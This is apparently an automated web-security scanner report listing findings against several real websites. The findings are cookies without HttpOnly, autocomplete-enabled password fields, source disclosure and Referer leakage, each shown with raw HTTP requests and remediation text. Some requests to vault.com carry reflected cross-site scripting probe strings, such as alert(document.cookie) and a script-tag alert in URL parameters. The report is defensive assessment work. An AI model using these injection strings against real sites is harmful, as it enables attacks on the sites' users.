GET /styles/buttons.css HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/!ut/p/c5/dY09D4IwGIR_0r3lhTaMfiEgIKaDtgspiSEoUgdj4r8X4uLC3XjP3cFi8ujefedevR_dgAusbKSIK63SgPY6ZMpKwQnXh2DHCjlsN_h2Jtc4z_U__HjiLWWkq5JlVHAhfjktaEWoUv-4wsCoxdNcThthltRxpMKpFUDDbPC8t3RTH_oCnk3SHg!!/?mode=&redirecturl=%2fwps%2fmyportal%2fusa%2frankingsf6c40'%3balert(document.cookie)%2f%2fdba4d06d54c%2findividual Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; JSESSIONID=00000-dJvfxGNM9UrnCQsyBDC18:140gkm3u6; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.4.8.1295451341966; _chartbeat2=1wcinl964s8aejot; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /styles/home.css HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /styles/jquery.autocomplete.css HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/!ut/p/c5/dY09D4IwGIR_0r3lhTaMfiEgIKaDtgspiSEoUgdj4r8X4uLC3XjP3cFi8ujefedevR_dgAusbKSIK63SgPY6ZMpKwQnXh2DHCjlsN_h2Jtc4z_U__HjiLWWkq5JlVHAhfjktaEWoUv-4wsCoxdNcThthltRxpMKpFUDDbPC8t3RTH_oCnk3SHg!!/?mode=&redirecturl=%2fwps%2fmyportal%2fusa%2frankingsf6c40'%3balert(document.cookie)%2f%2fdba4d06d54c%2findividual Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; JSESSIONID=00000-dJvfxGNM9UrnCQsyBDC18:140gkm3u6; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.4.8.1295451341966; _chartbeat2=1wcinl964s8aejot; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /styles/law-rankings.css HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1fa29d%22%3E%3Cscript%3Ealert(1)%3C/script%3E5276a27416&rankings=1&regionId=0/x22 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.5.8.1295451341966; _chartbeat2=1wcinl964s8aejot; JSESSIONID=0000PKS73Wmf_IK-VDDZBly2VV1:140i3s34m
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /styles/login.css HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/!ut/p/c5/dY09D4IwGIR_0r3lhTaMfiEgIKaDtgspiSEoUgdj4r8X4uLC3XjP3cFi8ujefedevR_dgAusbKSIK63SgPY6ZMpKwQnXh2DHCjlsN_h2Jtc4z_U__HjiLWWkq5JlVHAhfjktaEWoUv-4wsCoxdNcThthltRxpMKpFUDDbPC8t3RTH_oCnk3SHg!!/?mode=&redirecturl=%2fwps%2fmyportal%2fusa%2frankingsf6c40'%3balert(document.cookie)%2f%2fdba4d06d54c%2findividual Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; JSESSIONID=00000-dJvfxGNM9UrnCQsyBDC18:140gkm3u6; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.4.8.1295451341966; _chartbeat2=1wcinl964s8aejot; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /styles/main.css HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /styles/membership.css HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/!ut/p/c5/dY09D4IwGIR_0r3lhTaMfiEgIKaDtgspiSEoUgdj4r8X4uLC3XjP3cFi8ujefedevR_dgAusbKSIK63SgPY6ZMpKwQnXh2DHCjlsN_h2Jtc4z_U__HjiLWWkq5JlVHAhfjktaEWoUv-4wsCoxdNcThthltRxpMKpFUDDbPC8t3RTH_oCnk3SHg!!/?mode=&redirecturl=%2fwps%2fmyportal%2fusa%2frankingsf6c40'%3balert(document.cookie)%2f%2fdba4d06d54c%2findividual Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; JSESSIONID=00000-dJvfxGNM9UrnCQsyBDC18:140gkm3u6; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.4.8.1295451341966; _chartbeat2=1wcinl964s8aejot; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /styles/polls.css HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /styles/print.css HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <script type="text/javascript">var _sf_startpt=(new Date ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.weil.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The following cookie was issued by the application and does not have the HttpOnly flag set:
b=10011; domain=.yellowpages.com; path=/; expires=Thu, 20 Dec 2012 00:00:01 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Washington-DC/Attorneys HTTP/1.1 Host: www.yellowpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 19 Jan 2011 15:13:37 GMT Status: 301 Moved Permanently Server: nginx Content-Type: text/plain Location: http://www.yellowpages.com/washington-dc/attorneys Content-Length: 9 X-Urid: d-9ca453f0-060c-012e-b0d1-001e0be96752 Expires: Wed, 19 Jan 2011 15:13:36 GMT Cache-Control: no-cache Set-Cookie: b=10011; domain=.yellowpages.com; path=/; expires=Thu, 20 Dec 2012 00:00:01 GMT Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.
The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.
Issue remediation
To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).
The page contains a form with the following action URL:
http://dcregistry.com/cgi-bin/wbn/wbn_admin.pl
The form contains the following password field with autocomplete enabled:
password
Request
GET /wbn/welcome.html HTTP/1.1 Host: dcregistry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 15:20:53 GMT Server: Apache/2.2.11 (Unix) FrontPage/5.0.2.2635 PHP/5.2.6 Accept-Ranges: bytes Connection: close Content-Type: text/html Content-Length: 49869
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
The page contains a form with the following action URL:
http://dcregistry.com/cgi-bin/wbn2/wbn_admin.pl
The form contains the following password field with autocomplete enabled:
password
Request
GET /wbn/welcome.html HTTP/1.1 Host: dcregistry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 15:20:53 GMT Server: Apache/2.2.11 (Unix) FrontPage/5.0.2.2635 PHP/5.2.6 Accept-Ranges: bytes Connection: close Content-Type: text/html Content-Length: 49869
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
The form contains the following password field with autocomplete enabled:
password
Request
GET /TrkrSSL.html HTTP/1.1 Host: immigration.ebglaw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html Last-Modified: Thu, 02 Dec 2010 22:02:23 GMT Accept-Ranges: bytes ETag: "fe5bfa986c92cb1:0" Server: Microsoft-IIS/7.5 Date: Wed, 19 Jan 2011 18:10:05 GMT Connection: close Content-Length: 2619
The page contains a form with the following action URL:
https://login.yahoo.com/config/login?
The form contains the following password field with autocomplete enabled:
passwd
Request
GET /config/login HTTP/1.1 Host: login.yahoo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 18:09:20 GMT Set-Cookie: B=5u97cop6jea6g&b=3&s=jo; expires=Tue, 19-Jan-2013 20:00:00 GMT; path=/; domain=.yahoo.com P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" X-Frame-Options: DENY Cache-Control: private Connection: close Content-Type: text/html Content-Length: 41558
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Sign in ...[SNIP]... </legend>
The form contains the following password field with autocomplete enabled:
password
Request
GET /magazines/fortune/bestcompanies/2010/snapshots/65.html HTTP/1.1 Host: money.cnn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 15:25:12 GMT Server: Apache Accept-Ranges: bytes Cache-Control: max-age=60, private Expires: Wed, 19 Jan 2011 15:26:12 GMT Content-Type: text/html Vary: Accept-Encoding,User-Agent Connection: close Content-Length: 75163
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title>100 Best Companies to Work For 2010: Arnold & Porter - from FORTUNE</title> <meta HTTP-EQUIV="Pragma" CONTENT="no-c ...[SNIP]... <!-- start login --> <form onsubmit="return false;" id="cnnMoneyConnectFormLogin" class="overlay_content"> <a href="javascript:void(0)" class="close"> ...[SNIP]... </p> <input class="" id="passwordinput" name="password" type="password"> <div id="cnnConnectLoginErrors" style="display: none;"> ...[SNIP]...
The form contains the following password field with autocomplete enabled:
password
Request
GET /magazines/fortune/bestcompanies/2010/snapshots/65.html HTTP/1.1 Host: money.cnn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 15:25:12 GMT Server: Apache Accept-Ranges: bytes Cache-Control: max-age=60, private Expires: Wed, 19 Jan 2011 15:26:12 GMT Content-Type: text/html Vary: Accept-Encoding,User-Agent Connection: close Content-Length: 75163
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title>100 Best Companies to Work For 2010: Arnold & Porter - from FORTUNE</title> <meta HTTP-EQUIV="Pragma" CONTENT="no-c ...[SNIP]... <!-- start registration --> <form onsubmit="return false;" id="cnnConnectFormRegister" class="overlay_content"> <a href="javascript:void(0)" class="close"> ...[SNIP]... </p> <input id="signup_password" name="password" maxlength="10" type="password" /> <span class="fieldTip"> ...[SNIP]...
The form contains the following password field with autocomplete enabled:
newPassword
Request
GET /magazines/fortune/bestcompanies/2010/snapshots/65.html HTTP/1.1 Host: money.cnn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 15:25:12 GMT Server: Apache Accept-Ranges: bytes Cache-Control: max-age=60, private Expires: Wed, 19 Jan 2011 15:26:12 GMT Content-Type: text/html Vary: Accept-Encoding,User-Agent Connection: close Content-Length: 75163
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title>100 Best Companies to Work For 2010: Arnold & Porter - from FORTUNE</title> <meta HTTP-EQUIV="Pragma" CONTENT="no-c ...[SNIP]... <!-- start reset password --> <form id="cnnConnectFormReset" class="overlay_content"> <a href="javascript:void(0)" class="close"> ...[SNIP]... </p> <input type="password" id="new_password" name="newPassword"> <div id="cnnConnectResetErrors"> ...[SNIP]...
The page contains a form with the following action URL:
http://www.local.com/results.aspx
The form contains the following password field with autocomplete enabled:
password
Request
GET /results.aspx HTTP/1.1 Host: www.local.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The form contains the following password field with autocomplete enabled:
password
Request
GET /results.aspx?keyword=law+offices&CID=2531/x22 HTTP/1.1 Host: www.local.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The page contains a form with the following action URL:
http://www.political.cov.com/login.cfm
The form contains the following password field with autocomplete enabled:
password
Request
GET / HTTP/1.1 Host: www.political.cov.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 16:55:51 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFID=18273037;expires=Fri, 11-Jan-2041 16:55:51 GMT;path=/ Set-Cookie: CFTOKEN=87095538;expires=Fri, 11-Jan-2041 16:55:51 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The form contains the following password field with autocomplete enabled:
aPassword
Request
GET /alumni/Index.cfm HTTP/1.1 Host: www.skadden.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=34916643.1295449749.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); BACKLINK=; __utma=34916643.540692983.1295449749.1295449749.1295449749.1; __utmc=34916643; __utmb=34916643;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:14:39 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: ALSITETOKEN=;expires=Tue, 19-Jan-2010 15:14:39 GMT;path=/ Set-Cookie: ALUSERTOKEN=;expires=Tue, 19-Jan-2010 15:14:39 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//Dtd Xhtml 1.0 Strict//EN" "http://w ...[SNIP]... <td align="left" valign="top"> <form method="post" action="alumni_authenticate.cfm" id="loginFrm">
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <script type="text/javascript">var _sf_startpt=(new Date ...[SNIP]... </div>
The page contains a form with the following action URL:
http://www.vault.com/wps/portal/usa/membership
The form contains the following password fields with autocomplete enabled:
UserPassword
UserConfirm
Request
GET /wps/portal/usa/rankings/individual HTTP/1.1 Host: www.vault.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <script type="text/javascript">var _sf_startpt=(new Dat ...[SNIP]... </div>
The form contains the following password field with autocomplete enabled:
password
Request
GET /wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1&rankings=1&regionId=0/x22 HTTP/1.1 Host: www.vault.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <script type="text/javascript">var _sf_startpt=(new Dat ...[SNIP]... </div>
The form contains the following password fields with autocomplete enabled:
password
UserConfirm
Request
GET /wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1&rankings=1&regionId=0/x22 HTTP/1.1 Host: www.vault.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <script type="text/javascript">var _sf_startpt=(new Dat ...[SNIP]... </div>
The form contains the following password fields with autocomplete enabled:
password
UserConfirm
Request
GET /wps/portal/usa/rankings/individual HTTP/1.1 Host: www.vault.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <script type="text/javascript">var _sf_startpt=(new Dat ...[SNIP]... </div>
The form contains the following password field with autocomplete enabled:
password
Request
GET /wps/portal/usa/rankings/individual HTTP/1.1 Host: www.vault.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <script type="text/javascript">var _sf_startpt=(new Dat ...[SNIP]... </div>
Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.
Issue remediation
Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.
The application appears to disclose some server-side source code written in PHP.
Request
GET /bookmark.php HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 15:26:37 GMT Server: Apache X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/ Content-Length: 92372
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <meta name="copyright" content="<?php echo AT_COPYRIGHT_TEXT ?>" /> ...[SNIP]...
The page contains a form which POSTs data to the domain links.mkt1259.com. The form contains the following fields:
EMAIL_REQUIRED
EMAIL_DATATYPE
EMAIL
submit
Issue background
The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.
Request
GET /USA/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law HTTP/1.1 Host: www.csmonitor.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache/2.2.12 (Ubuntu) Content-Length: 80578 Content-Type: text/html; charset=utf-8 X-Powered-By: eZ Publish Content-Language: en-US Served-by: Pragma: Cache-Control: max-age=2959 Expires: Wed, 19 Jan 2011 16:37:01 GMT Date: Wed, 19 Jan 2011 15:47:42 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Issue background
If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.
Issue remediation
The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.
Request
GET /config/login HTTP/1.1 Host: login.yahoo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 18:09:20 GMT Set-Cookie: B=5u97cop6jea6g&b=3&s=jo; expires=Tue, 19-Jan-2013 20:00:00 GMT; path=/; domain=.yahoo.com P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" X-Frame-Options: DENY Cache-Control: private Connection: close Content-Type: text/html Content-Length: 41558
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Sign in ...[SNIP]...
15. Cross-domain Referer leakage
There are 42 instances of this issue:
When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.
If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.
You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.
Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.
Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.
Issue remediation
The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.
The response contains the following links to other domains:
http://www.e-classifieds.net/
http://www.hagenhosting.com/
http://www.hagensoftware.com/
Request
GET /cgi-bin/classifieds/classifieds.cgi?db=personals HTTP/1.1
Host: dcregistry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:21:25 GMT
Server: Apache/2.2.11 (Unix) FrontPage/5.0.2.2635 PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 52149
The response contains the following links to other domains:
http://www.e-classifieds.net/
http://www.hagenhosting.com/
http://www.hagensoftware.com/
Request
GET /cgi-bin/surveys/survey.cgi?db=aad_look&website=&language=&display_past_polls=on HTTP/1.1
Host: dcregistry.com
Accept: */*
Accept-Language: en
